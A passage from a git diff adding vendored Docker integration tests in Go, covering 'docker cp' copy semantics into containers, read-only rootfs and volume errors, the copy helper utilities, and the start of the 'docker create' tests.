+func (s *DockerSuite) TestCpToCaseB(c *check.C) { + containerID := makeTestContainer(c, testContainerOptions{ + command: makeCatFileCommand("testDir/file1"), + }) + + tmpDir := getTestDir(c, "test-cp-to-case-b") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcPath := cpPath(tmpDir, "file1") + dstDir := containerCpPathTrailingSep(containerID, "testDir") + + err := runDockerCp(c, srcPath, dstDir) + c.Assert(err, checker.NotNil) + + c.Assert(isCpDirNotExist(err), checker.True, check.Commentf("expected DirNotExists error, but got %T: %s", err, err)) +} + +// C. SRC specifies a file and DST exists as a file. This should overwrite +// the file at DST with the contents of the source file. +func (s *DockerSuite) TestCpToCaseC(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + command: makeCatFileCommand("file2"), + }) + + tmpDir := getTestDir(c, "test-cp-to-case-c") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcPath := cpPath(tmpDir, "file1") + dstPath := containerCpPath(containerID, "/root/file2") + + // Ensure the container's file starts with the original content. + c.Assert(containerStartOutputEquals(c, containerID, "file2\n"), checker.IsNil) + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // Should now contain file1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil) +} + +// D. SRC specifies a file and DST exists as a directory. This should place +// a copy of the source file inside it using the basename from SRC. Ensure +// this works whether DST has a trailing path separator or not. 
+func (s *DockerSuite) TestCpToCaseD(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, + command: makeCatFileCommand("/dir1/file1"), + }) + + tmpDir := getTestDir(c, "test-cp-to-case-d") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcPath := cpPath(tmpDir, "file1") + dstDir := containerCpPath(containerID, "dir1") + + // Ensure that dstPath doesn't exist. + c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) + + c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil) + + // Should now contain file1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil) + + // Now try again but using a trailing path separator for dstDir. + + // Make new destination container. + containerID = makeTestContainer(c, testContainerOptions{ + addContent: true, + command: makeCatFileCommand("/dir1/file1"), + }) + + dstDir = containerCpPathTrailingSep(containerID, "dir1") + + // Ensure that dstPath doesn't exist. + c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) + + c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil) + + // Should now contain file1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil) +} + +// E. SRC specifies a directory and DST does not exist. This should create a +// directory at DST and copy the contents of the SRC directory into the DST +// directory. Ensure this works whether DST has a trailing path separator or +// not. 
+func (s *DockerSuite) TestCpToCaseE(c *check.C) { + containerID := makeTestContainer(c, testContainerOptions{ + command: makeCatFileCommand("/testDir/file1-1"), + }) + + tmpDir := getTestDir(c, "test-cp-to-case-e") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcDir := cpPath(tmpDir, "dir1") + dstDir := containerCpPath(containerID, "testDir") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + // Should now contain file1-1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) + + // Now try again but using a trailing path separator for dstDir. + + // Make new destination container. + containerID = makeTestContainer(c, testContainerOptions{ + command: makeCatFileCommand("/testDir/file1-1"), + }) + + dstDir = containerCpPathTrailingSep(containerID, "testDir") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + // Should now contain file1-1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) +} + +// F. SRC specifies a directory and DST exists as a file. This should cause an +// error as it is not possible to overwrite a file with a directory. +func (s *DockerSuite) TestCpToCaseF(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + }) + + tmpDir := getTestDir(c, "test-cp-to-case-f") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcDir := cpPath(tmpDir, "dir1") + dstFile := containerCpPath(containerID, "/root/file1") + + err := runDockerCp(c, srcDir, dstFile) + c.Assert(err, checker.NotNil) + + c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err)) +} + +// G. SRC specifies a directory and DST exists as a directory. This should copy +// the SRC directory and all its contents to the DST directory. 
Ensure this +// works whether DST has a trailing path separator or not. +func (s *DockerSuite) TestCpToCaseG(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + command: makeCatFileCommand("dir2/dir1/file1-1"), + }) + + tmpDir := getTestDir(c, "test-cp-to-case-g") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcDir := cpPath(tmpDir, "dir1") + dstDir := containerCpPath(containerID, "/root/dir2") + + // Ensure that dstPath doesn't exist. + c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + // Should now contain file1-1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) + + // Now try again but using a trailing path separator for dstDir. + + // Make new destination container. + containerID = makeTestContainer(c, testContainerOptions{ + addContent: true, + command: makeCatFileCommand("/dir2/dir1/file1-1"), + }) + + dstDir = containerCpPathTrailingSep(containerID, "/dir2") + + // Ensure that dstPath doesn't exist. + c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + // Should now contain file1-1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) +} + +// H. SRC specifies a directory's contents only and DST does not exist. This +// should create a directory at DST and copy the contents of the SRC +// directory (but not the directory itself) into the DST directory. Ensure +// this works whether DST has a trailing path separator or not. 
+func (s *DockerSuite) TestCpToCaseH(c *check.C) { + containerID := makeTestContainer(c, testContainerOptions{ + command: makeCatFileCommand("/testDir/file1-1"), + }) + + tmpDir := getTestDir(c, "test-cp-to-case-h") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcDir := cpPathTrailingSep(tmpDir, "dir1") + "." + dstDir := containerCpPath(containerID, "testDir") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + // Should now contain file1-1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) + + // Now try again but using a trailing path separator for dstDir. + + // Make new destination container. + containerID = makeTestContainer(c, testContainerOptions{ + command: makeCatFileCommand("/testDir/file1-1"), + }) + + dstDir = containerCpPathTrailingSep(containerID, "testDir") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + // Should now contain file1-1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) +} + +// I. SRC specifies a directory's contents only and DST exists as a file. This +// should cause an error as it is not possible to overwrite a file with a +// directory. +func (s *DockerSuite) TestCpToCaseI(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + }) + + tmpDir := getTestDir(c, "test-cp-to-case-i") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcDir := cpPathTrailingSep(tmpDir, "dir1") + "." + dstFile := containerCpPath(containerID, "/root/file1") + + err := runDockerCp(c, srcDir, dstFile) + c.Assert(err, checker.NotNil) + + c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err)) +} + +// J. SRC specifies a directory's contents only and DST exists as a directory. 
+// This should copy the contents of the SRC directory (but not the directory +// itself) into the DST directory. Ensure this works whether DST has a +// trailing path separator or not. +func (s *DockerSuite) TestCpToCaseJ(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + command: makeCatFileCommand("/dir2/file1-1"), + }) + + tmpDir := getTestDir(c, "test-cp-to-case-j") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcDir := cpPathTrailingSep(tmpDir, "dir1") + "." + dstDir := containerCpPath(containerID, "/dir2") + + // Ensure that dstPath doesn't exist. + c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + // Should now contain file1-1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) + + // Now try again but using a trailing path separator for dstDir. + + // Make new destination container. + containerID = makeTestContainer(c, testContainerOptions{ + command: makeCatFileCommand("/dir2/file1-1"), + }) + + dstDir = containerCpPathTrailingSep(containerID, "/dir2") + + // Ensure that dstPath doesn't exist. + c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + // Should now contain file1-1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) +} + +// The `docker cp` command should also ensure that you cannot +// write to a container rootfs that is marked as read-only. 
+func (s *DockerSuite) TestCpToErrReadOnlyRootfs(c *check.C) { + // --read-only + userns has remount issues + testRequires(c, DaemonIsLinux, NotUserNamespace) + tmpDir := getTestDir(c, "test-cp-to-err-read-only-rootfs") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + containerID := makeTestContainer(c, testContainerOptions{ + readOnly: true, workDir: "/root", + command: makeCatFileCommand("shouldNotExist"), + }) + + srcPath := cpPath(tmpDir, "file1") + dstPath := containerCpPath(containerID, "/root/shouldNotExist") + + err := runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCpCannotCopyReadOnly(err), checker.True, check.Commentf("expected ErrContainerRootfsReadonly error, but got %T: %s", err, err)) + + // Ensure that dstPath doesn't exist. + c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) +} + +// The `docker cp` command should also ensure that you +// cannot write to a volume that is mounted as read-only. +func (s *DockerSuite) TestCpToErrReadOnlyVolume(c *check.C) { + // --read-only + userns has remount issues + testRequires(c, DaemonIsLinux, NotUserNamespace) + tmpDir := getTestDir(c, "test-cp-to-err-read-only-volume") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + containerID := makeTestContainer(c, testContainerOptions{ + volumes: defaultVolumes(tmpDir), workDir: "/root", + command: makeCatFileCommand("/vol_ro/shouldNotExist"), + }) + + srcPath := cpPath(tmpDir, "file1") + dstPath := containerCpPath(containerID, "/vol_ro/shouldNotExist") + + err := runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCpCannotCopyReadOnly(err), checker.True, check.Commentf("expected ErrVolumeReadonly error, but got %T: %s", err, err)) + + // Ensure that dstPath doesn't exist. 
+ c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go new file mode 100644 index 0000000000..45d85ba5d1 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go @@ -0,0 +1,39 @@ +// +build !windows + +package main + +import ( + "fmt" + "os" + "path/filepath" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/system" + "github.com/go-check/check" +) + +// Check ownership is root, both in non-userns and userns enabled modes +func (s *DockerSuite) TestCpCheckDestOwnership(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + tmpVolDir := getTestDir(c, "test-cp-tmpvol") + containerID := makeTestContainer(c, + testContainerOptions{volumes: []string{fmt.Sprintf("%s:/tmpvol", tmpVolDir)}}) + + tmpDir := getTestDir(c, "test-cp-to-check-ownership") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcPath := cpPath(tmpDir, "file1") + dstPath := containerCpPath(containerID, "/tmpvol", "file1") + + err := runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.IsNil) + + stat, err := system.Stat(filepath.Join(tmpVolDir, "file1")) + c.Assert(err, checker.IsNil) + uid, gid, err := getRootUIDGID() + c.Assert(err, checker.IsNil) + c.Assert(stat.UID(), checker.Equals, uint32(uid), check.Commentf("Copied file not owned by container root UID")) + c.Assert(stat.GID(), checker.Equals, uint32(gid), check.Commentf("Copied file not owned by container root GID")) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go new file mode 100644 index 0000000000..0501c5d735 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go @@ 
-0,0 +1,303 @@ +package main + +import ( + "bytes" + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "strings" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +type fileType uint32 + +const ( + ftRegular fileType = iota + ftDir + ftSymlink +) + +type fileData struct { + filetype fileType + path string + contents string +} + +func (fd fileData) creationCommand() string { + var command string + + switch fd.filetype { + case ftRegular: + // Don't overwrite the file if it already exists! + command = fmt.Sprintf("if [ ! -f %s ]; then echo %q > %s; fi", fd.path, fd.contents, fd.path) + case ftDir: + command = fmt.Sprintf("mkdir -p %s", fd.path) + case ftSymlink: + command = fmt.Sprintf("ln -fs %s %s", fd.contents, fd.path) + } + + return command +} + +func mkFilesCommand(fds []fileData) string { + commands := make([]string, len(fds)) + + for i, fd := range fds { + commands[i] = fd.creationCommand() + } + + return strings.Join(commands, " && ") +} + +var defaultFileData = []fileData{ + {ftRegular, "file1", "file1"}, + {ftRegular, "file2", "file2"}, + {ftRegular, "file3", "file3"}, + {ftRegular, "file4", "file4"}, + {ftRegular, "file5", "file5"}, + {ftRegular, "file6", "file6"}, + {ftRegular, "file7", "file7"}, + {ftDir, "dir1", ""}, + {ftRegular, "dir1/file1-1", "file1-1"}, + {ftRegular, "dir1/file1-2", "file1-2"}, + {ftDir, "dir2", ""}, + {ftRegular, "dir2/file2-1", "file2-1"}, + {ftRegular, "dir2/file2-2", "file2-2"}, + {ftDir, "dir3", ""}, + {ftRegular, "dir3/file3-1", "file3-1"}, + {ftRegular, "dir3/file3-2", "file3-2"}, + {ftDir, "dir4", ""}, + {ftRegular, "dir4/file3-1", "file4-1"}, + {ftRegular, "dir4/file3-2", "file4-2"}, + {ftDir, "dir5", ""}, + {ftSymlink, "symlinkToFile1", "file1"}, + {ftSymlink, "symlinkToDir1", "dir1"}, + {ftSymlink, "brokenSymlinkToFileX", "fileX"}, + {ftSymlink, "brokenSymlinkToDirX", "dirX"}, + {ftSymlink, "symlinkToAbsDir", "/root"}, +} + +func 
defaultMkContentCommand() string { + return mkFilesCommand(defaultFileData) +} + +func makeTestContentInDir(c *check.C, dir string) { + for _, fd := range defaultFileData { + path := filepath.Join(dir, filepath.FromSlash(fd.path)) + switch fd.filetype { + case ftRegular: + c.Assert(ioutil.WriteFile(path, []byte(fd.contents+"\n"), os.FileMode(0666)), checker.IsNil) + case ftDir: + c.Assert(os.Mkdir(path, os.FileMode(0777)), checker.IsNil) + case ftSymlink: + c.Assert(os.Symlink(fd.contents, path), checker.IsNil) + } + } +} + +type testContainerOptions struct { + addContent bool + readOnly bool + volumes []string + workDir string + command string +} + +func makeTestContainer(c *check.C, options testContainerOptions) (containerID string) { + if options.addContent { + mkContentCmd := defaultMkContentCommand() + if options.command == "" { + options.command = mkContentCmd + } else { + options.command = fmt.Sprintf("%s && %s", defaultMkContentCommand(), options.command) + } + } + + if options.command == "" { + options.command = "#(nop)" + } + + args := []string{"run", "-d"} + + for _, volume := range options.volumes { + args = append(args, "-v", volume) + } + + if options.workDir != "" { + args = append(args, "-w", options.workDir) + } + + if options.readOnly { + args = append(args, "--read-only") + } + + args = append(args, "busybox", "/bin/sh", "-c", options.command) + + out, _ := dockerCmd(c, args...) 
+ + containerID = strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + + exitCode := strings.TrimSpace(out) + if exitCode != "0" { + out, _ = dockerCmd(c, "logs", containerID) + } + c.Assert(exitCode, checker.Equals, "0", check.Commentf("failed to make test container: %s", out)) + + return +} + +func makeCatFileCommand(path string) string { + return fmt.Sprintf("if [ -f %s ]; then cat %s; fi", path, path) +} + +func cpPath(pathElements ...string) string { + localizedPathElements := make([]string, len(pathElements)) + for i, path := range pathElements { + localizedPathElements[i] = filepath.FromSlash(path) + } + return strings.Join(localizedPathElements, string(filepath.Separator)) +} + +func cpPathTrailingSep(pathElements ...string) string { + return fmt.Sprintf("%s%c", cpPath(pathElements...), filepath.Separator) +} + +func containerCpPath(containerID string, pathElements ...string) string { + joined := strings.Join(pathElements, "/") + return fmt.Sprintf("%s:%s", containerID, joined) +} + +func containerCpPathTrailingSep(containerID string, pathElements ...string) string { + return fmt.Sprintf("%s/", containerCpPath(containerID, pathElements...)) +} + +func runDockerCp(c *check.C, src, dst string) (err error) { + c.Logf("running `docker cp %s %s`", src, dst) + + args := []string{"cp", src, dst} + + out, _, err := runCommandWithOutput(exec.Command(dockerBinary, args...)) + if err != nil { + err = fmt.Errorf("error executing `docker cp` command: %s: %s", err, out) + } + + return +} + +func startContainerGetOutput(c *check.C, containerID string) (out string, err error) { + c.Logf("running `docker start -a %s`", containerID) + + args := []string{"start", "-a", containerID} + + out, _, err = runCommandWithOutput(exec.Command(dockerBinary, args...)) + if err != nil { + err = fmt.Errorf("error executing `docker start` command: %s: %s", err, out) + } + + return +} + +func getTestDir(c *check.C, label string) (tmpDir string) { + var err error + + 
tmpDir, err = ioutil.TempDir("", label) + // unable to make temporary directory + c.Assert(err, checker.IsNil) + + return +} + +func isCpNotExist(err error) bool { + return strings.Contains(err.Error(), "no such file or directory") || strings.Contains(err.Error(), "cannot find the file specified") +} + +func isCpDirNotExist(err error) bool { + return strings.Contains(err.Error(), archive.ErrDirNotExists.Error()) +} + +func isCpNotDir(err error) bool { + return strings.Contains(err.Error(), archive.ErrNotDirectory.Error()) || strings.Contains(err.Error(), "filename, directory name, or volume label syntax is incorrect") +} + +func isCpCannotCopyDir(err error) bool { + return strings.Contains(err.Error(), archive.ErrCannotCopyDir.Error()) +} + +func isCpCannotCopyReadOnly(err error) bool { + return strings.Contains(err.Error(), "marked read-only") +} + +func isCannotOverwriteNonDirWithDir(err error) bool { + return strings.Contains(err.Error(), "cannot overwrite non-directory") +} + +func fileContentEquals(c *check.C, filename, contents string) (err error) { + c.Logf("checking that file %q contains %q\n", filename, contents) + + fileBytes, err := ioutil.ReadFile(filename) + if err != nil { + return + } + + expectedBytes, err := ioutil.ReadAll(strings.NewReader(contents)) + if err != nil { + return + } + + if !bytes.Equal(fileBytes, expectedBytes) { + err = fmt.Errorf("file content not equal - expected %q, got %q", string(expectedBytes), string(fileBytes)) + } + + return +} + +func symlinkTargetEquals(c *check.C, symlink, expectedTarget string) (err error) { + c.Logf("checking that the symlink %q points to %q\n", symlink, expectedTarget) + + actualTarget, err := os.Readlink(symlink) + if err != nil { + return + } + + if actualTarget != expectedTarget { + err = fmt.Errorf("symlink target points to %q not %q", actualTarget, expectedTarget) + } + + return +} + +func containerStartOutputEquals(c *check.C, containerID, contents string) (err error) { + c.Logf("checking that 
container %q start output contains %q\n", containerID, contents) + + out, err := startContainerGetOutput(c, containerID) + if err != nil { + return + } + + if out != contents { + err = fmt.Errorf("output contents not equal - expected %q, got %q", contents, out) + } + + return +} + +func defaultVolumes(tmpDir string) []string { + if SameHostDaemon.Condition() { + return []string{ + "/vol1", + fmt.Sprintf("%s:/vol2", tmpDir), + fmt.Sprintf("%s:/vol3", filepath.Join(tmpDir, "vol3")), + fmt.Sprintf("%s:/vol_ro:ro", filepath.Join(tmpDir, "vol_ro")), + } + } + + // Can't bind-mount volumes with separate host daemon. + return []string{"/vol1", "/vol2", "/vol3", "/vol_ro:/vol_ro:ro"} +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go new file mode 100644 index 0000000000..515a340976 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go @@ -0,0 +1,513 @@ +package main + +import ( + "encoding/json" + "fmt" + "os" + "reflect" + "strings" + "time" + + "os/exec" + + "io/ioutil" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/go-connections/nat" + "github.com/go-check/check" +) + +// Make sure we can create a simple container with some args +func (s *DockerSuite) TestCreateArgs(c *check.C) { + // Intentionally clear entrypoint, as the Windows busybox image needs an entrypoint, which breaks this test + out, _ := dockerCmd(c, "create", "--entrypoint=", "busybox", "command", "arg1", "arg2", "arg with space", "-c", "flags") + + cleanedContainerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "inspect", cleanedContainerID) + + containers := []struct { + ID string + Created time.Time + Path string + Args []string + Image string + }{} + + err := json.Unmarshal([]byte(out), &containers) + c.Assert(err, check.IsNil, check.Commentf("Error inspecting the 
container: %s", err)) + c.Assert(containers, checker.HasLen, 1) + + cont := containers[0] + c.Assert(string(cont.Path), checker.Equals, "command", check.Commentf("Unexpected container path. Expected command, received: %s", cont.Path)) + + b := false + expected := []string{"arg1", "arg2", "arg with space", "-c", "flags"} + for i, arg := range expected { + if arg != cont.Args[i] { + b = true + break + } + } + if len(cont.Args) != len(expected) || b { + c.Fatalf("Unexpected args. Expected %v, received: %v", expected, cont.Args) + } + +} + +// Make sure we can grow the container's rootfs at creation time. +func (s *DockerSuite) TestCreateGrowRootfs(c *check.C) { + // Windows and Devicemapper support growing the rootfs + if daemonPlatform != "windows" { + testRequires(c, Devicemapper) + } + out, _ := dockerCmd(c, "create", "--storage-opt", "size=120G", "busybox") + + cleanedContainerID := strings.TrimSpace(out) + + inspectOut := inspectField(c, cleanedContainerID, "HostConfig.StorageOpt") + c.Assert(inspectOut, checker.Equals, "map[size:120G]") +} + +// Make sure we cannot shrink the container's rootfs at creation time. 
+func (s *DockerSuite) TestCreateShrinkRootfs(c *check.C) { + testRequires(c, Devicemapper) + + // Ensure this fails because of the defaultBaseFsSize is 10G + out, _, err := dockerCmdWithError("create", "--storage-opt", "size=5G", "busybox") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Container size cannot be smaller than") +} + +// Make sure we can set hostconfig options too +func (s *DockerSuite) TestCreateHostConfig(c *check.C) { + out, _ := dockerCmd(c, "create", "-P", "busybox", "echo") + + cleanedContainerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "inspect", cleanedContainerID) + + containers := []struct { + HostConfig *struct { + PublishAllPorts bool + } + }{} + + err := json.Unmarshal([]byte(out), &containers) + c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err)) + c.Assert(containers, checker.HasLen, 1) + + cont := containers[0] + c.Assert(cont.HostConfig, check.NotNil, check.Commentf("Expected HostConfig, got none")) + c.Assert(cont.HostConfig.PublishAllPorts, check.NotNil, check.Commentf("Expected PublishAllPorts, got false")) +} + +func (s *DockerSuite) TestCreateWithPortRange(c *check.C) { + out, _ := dockerCmd(c, "create", "-p", "3300-3303:3300-3303/tcp", "busybox", "echo") + + cleanedContainerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "inspect", cleanedContainerID) + + containers := []struct { + HostConfig *struct { + PortBindings map[nat.Port][]nat.PortBinding + } + }{} + err := json.Unmarshal([]byte(out), &containers) + c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err)) + c.Assert(containers, checker.HasLen, 1) + + cont := containers[0] + + c.Assert(cont.HostConfig, check.NotNil, check.Commentf("Expected HostConfig, got none")) + c.Assert(cont.HostConfig.PortBindings, checker.HasLen, 4, check.Commentf("Expected 4 ports bindings, got %d", len(cont.HostConfig.PortBindings))) + + for k, v := range 
cont.HostConfig.PortBindings { + c.Assert(v, checker.HasLen, 1, check.Commentf("Expected 1 ports binding, for the port %s but found %s", k, v)) + c.Assert(k.Port(), checker.Equals, v[0].HostPort, check.Commentf("Expected host port %s to match published port %s", k.Port(), v[0].HostPort)) + + } + +} + +func (s *DockerSuite) TestCreateWithLargePortRange(c *check.C) { + out, _ := dockerCmd(c, "create", "-p", "1-65535:1-65535/tcp", "busybox", "echo") + + cleanedContainerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "inspect", cleanedContainerID) + + containers := []struct { + HostConfig *struct { + PortBindings map[nat.Port][]nat.PortBinding + } + }{} + + err := json.Unmarshal([]byte(out), &containers) + c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err)) + c.Assert(containers, checker.HasLen, 1) + + cont := containers[0] + c.Assert(cont.HostConfig, check.NotNil, check.Commentf("Expected HostConfig, got none")) + c.Assert(cont.HostConfig.PortBindings, checker.HasLen, 65535) + + for k, v := range cont.HostConfig.PortBindings { + c.Assert(v, checker.HasLen, 1) + c.Assert(k.Port(), checker.Equals, v[0].HostPort, check.Commentf("Expected host port %s to match published port %s", k.Port(), v[0].HostPort)) + } + +} + +// "test123" should be printed by docker create + start +func (s *DockerSuite) TestCreateEchoStdout(c *check.C) { + out, _ := dockerCmd(c, "create", "busybox", "echo", "test123") + + cleanedContainerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "start", "-ai", cleanedContainerID) + c.Assert(out, checker.Equals, "test123\n", check.Commentf("container should've printed 'test123', got %q", out)) + +} + +func (s *DockerSuite) TestCreateVolumesCreated(c *check.C) { + testRequires(c, SameHostDaemon) + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + + name := "test_create_volume" + dockerCmd(c, "create", "--name", name, "-v", prefix+slash+"foo", "busybox") + + dir, err := inspectMountSourceField(name, 
prefix+slash+"foo") + c.Assert(err, check.IsNil, check.Commentf("Error getting volume host path: %q", err)) + + if _, err := os.Stat(dir); err != nil && os.IsNotExist(err) { + c.Fatalf("Volume was not created") + } + if err != nil { + c.Fatalf("Error statting volume host path: %q", err) + } + +} + +func (s *DockerSuite) TestCreateLabels(c *check.C) { + name := "test_create_labels" + expected := map[string]string{"k1": "v1", "k2": "v2"} + dockerCmd(c, "create", "--name", name, "-l", "k1=v1", "--label", "k2=v2", "busybox") + + actual := make(map[string]string) + inspectFieldAndMarshall(c, name, "Config.Labels", &actual) + + if !reflect.DeepEqual(expected, actual) { + c.Fatalf("Expected %s got %s", expected, actual) + } +} + +func (s *DockerSuite) TestCreateLabelFromImage(c *check.C) { + imageName := "testcreatebuildlabel" + _, err := buildImage(imageName, + `FROM busybox + LABEL k1=v1 k2=v2`, + true) + + c.Assert(err, check.IsNil) + + name := "test_create_labels_from_image" + expected := map[string]string{"k2": "x", "k3": "v3", "k1": "v1"} + dockerCmd(c, "create", "--name", name, "-l", "k2=x", "--label", "k3=v3", imageName) + + actual := make(map[string]string) + inspectFieldAndMarshall(c, name, "Config.Labels", &actual) + + if !reflect.DeepEqual(expected, actual) { + c.Fatalf("Expected %s got %s", expected, actual) + } +} + +func (s *DockerSuite) TestCreateHostnameWithNumber(c *check.C) { + image := "busybox" + // Busybox on Windows does not implement hostname command + if daemonPlatform == "windows" { + image = WindowsBaseImage + } + out, _ := dockerCmd(c, "run", "-h", "web.0", image, "hostname") + c.Assert(strings.TrimSpace(out), checker.Equals, "web.0", check.Commentf("hostname not set, expected `web.0`, got: %s", out)) + +} + +func (s *DockerSuite) TestCreateRM(c *check.C) { + // Test to make sure we can 'rm' a new container that is in + // "Created" state, and has ever been run. Test "rm -f" too. 
+ + // create a container + out, _ := dockerCmd(c, "create", "busybox") + cID := strings.TrimSpace(out) + + dockerCmd(c, "rm", cID) + + // Now do it again so we can "rm -f" this time + out, _ = dockerCmd(c, "create", "busybox") + + cID = strings.TrimSpace(out) + dockerCmd(c, "rm", "-f", cID) +} + +func (s *DockerSuite) TestCreateModeIpcContainer(c *check.C) { + // Uses Linux specific functionality (--ipc) + testRequires(c, DaemonIsLinux, SameHostDaemon) + + out, _ := dockerCmd(c, "create", "busybox") + id := strings.TrimSpace(out) + + dockerCmd(c, "create", fmt.Sprintf("--ipc=container:%s", id), "busybox") +} + +func (s *DockerSuite) TestCreateByImageID(c *check.C) { + imageName := "testcreatebyimageid" + imageID, err := buildImage(imageName, + `FROM busybox + MAINTAINER dockerio`, + true) + if err != nil { + c.Fatal(err) + } + truncatedImageID := stringid.TruncateID(imageID) + + dockerCmd(c, "create", imageID) + dockerCmd(c, "create", truncatedImageID) + dockerCmd(c, "create", fmt.Sprintf("%s:%s", imageName, truncatedImageID)) + + // Ensure this fails + out, exit, _ := dockerCmdWithError("create", fmt.Sprintf("%s:%s", imageName, imageID)) + if exit == 0 { + c.Fatalf("expected non-zero exit code; received %d", exit) + } + + if expected := "Error parsing reference"; !strings.Contains(out, expected) { + c.Fatalf(`Expected %q in output; got: %s`, expected, out) + } + + out, exit, _ = dockerCmdWithError("create", fmt.Sprintf("%s:%s", "wrongimage", truncatedImageID)) + if exit == 0 { + c.Fatalf("expected non-zero exit code; received %d", exit) + } + + if expected := "Unable to find image"; !strings.Contains(out, expected) { + c.Fatalf(`Expected %q in output; got: %s`, expected, out) + } +} + +func (s *DockerTrustSuite) TestTrustedCreate(c *check.C) { + repoName := s.setupTrustedImage(c, "trusted-create") + + // Try create + 